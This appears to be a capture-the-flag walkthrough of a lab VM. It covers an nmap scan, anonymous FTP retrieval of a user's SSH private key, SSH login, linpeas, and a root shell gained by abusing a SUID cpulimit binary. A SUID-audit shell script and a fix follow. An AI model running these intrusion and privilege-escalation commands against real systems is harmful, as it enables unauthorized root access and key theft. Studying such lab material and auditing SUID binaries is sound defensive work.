sudo nmap 192.168.172.130 -p- -sS -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP on the host is open to anonymous login. Once logged in, use ls -la to view hidden files. After moving into the .hannah directory, ensure binary mode is enabled, then download the id_rsa file.
Change the permissions on id_rsa so that it is usable; ssh refuses a private key that other users can read.
chmod 600 id_rsa
Then log in as the user hannah, specifying port 61000.
ssh -p 61000 -i id_rsa [email protected]
After transferring linpeas to the target machine and running it, it reports that the binary cpulimit has the SUID bit set.
Checking GTFOBins against this binary reports the following:
We can then use the following command to gain a root shell:
/usr/bin/cpulimit -l 100 -f -- /bin/sh -p
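
The misconfiguration used above can be found from the defender's side with a SUID audit. The script below is an added example, not part of the original walkthrough: the function name audit_suid and the watchlist are assumptions (only cpulimit comes from this page, the other names are a constructed sample of binaries that can run arbitrary commands).

```shell
#!/bin/sh
# Added example: list set-user-ID files under a directory tree and flag
# those whose name is on a watchlist of command-running binaries.

# Constructed sample watchlist. cpulimit is the binary from this page;
# extend the list from your own review of GTFOBins.
WATCHLIST="cpulimit find env vim bash"

# audit_suid ROOT
# Prints one line per SUID file found under ROOT:
#   FLAGGED <path>   name is on the watchlist, remove the bit or the package
#   REVIEW <path>    SUID but not on the watchlist, confirm it is expected
# Returns 1 if at least one file was flagged, otherwise 0.
audit_suid() {
    root=$1
    flagged=0
    # -perm -4000 matches files with the set-user-ID bit; -xdev stays on
    # one filesystem so network and pseudo filesystems are skipped.
    list=$(find "$root" -xdev -type f -perm -4000 2>/dev/null | sort)
    if [ -z "$list" ]; then
        return 0
    fi
    while IFS= read -r path; do
        name=$(basename "$path")
        status=REVIEW
        for w in $WATCHLIST; do
            if [ "$name" = "$w" ]; then
                status=FLAGGED
            fi
        done
        if [ "$status" = FLAGGED ]; then
            flagged=1
        fi
        printf '%s %s\n' "$status" "$path"
    done <<EOF
$list
EOF
    return "$flagged"
}

# Stand-alone use: sh audit_suid.sh /usr/bin
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

A FLAGGED line for cpulimit is fixed by removing the bit (chmod u-s on the reported path) or uninstalling the package if nothing depends on it.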